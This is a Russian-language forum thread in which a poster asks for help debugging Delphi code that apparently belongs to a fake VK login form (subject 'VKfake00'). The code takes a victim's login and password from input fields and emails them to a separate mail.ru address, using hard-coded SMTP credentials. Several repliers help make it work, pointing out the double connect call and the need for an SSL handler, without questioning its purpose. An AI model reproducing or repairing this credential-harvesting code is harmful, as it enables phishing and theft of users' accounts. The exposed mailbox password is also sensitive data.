Марина Слесарева

Ошибка в отправки письма на почту. Delphi

Ребята прошу помогите мне с программным кодом. У меня пишет ошибку что-то типо AlreadyConnected.

idSmtp1.Host:='smtp.mail.ru';

idSmtp1.Port:=465;

idSmtp1.Username:='krekhov00@mail.ru';

idSmtp1.Password:='ram228323';

idMessage1.Body.Text:='Ëîãèí/'+Edit1.text+'Ïàðîëü/'+Edit2.Text;

idMessage1.From.Text:='krekhov00@mail.ru';

idMessage1.Recipients.EMailAddresses:='mister_q00@mail.ru';

idMessage1.Subject:='VKfake00';

IdMessage1.CharSet:='koi8-r';

idSmtp1.Connect();

if idSmtp1.Connected=true then

idSmtp1.Send(idMessage1)

else

idSmtp1.Disconnect;

Танюшка

idSmtp1.Connect(); на этой строке вылетает ошибка посмотри в свойствах idSmtp1 он у тебя уже включен а ты еще раз пытаешся

Александр Давыдов

Не спорю, ошибка пропала, но у меня гораздо хуже проблема. Ошибок не вылетает, но письмо на почту не приходит. Не могли бы сказать в чем проблема?
Может я где-то не правильно пишу логин и пароль или почту?

Таня Винокурова

без компонента IdSSLIOHandlerSocketOpenSSL не отправишь. См alfa666omega.16mb.com/?q=node/1

Фаина Эдильбаева

Не прощи ли подключить smtp.bz через phpmailer например и забыть о подобных проблемах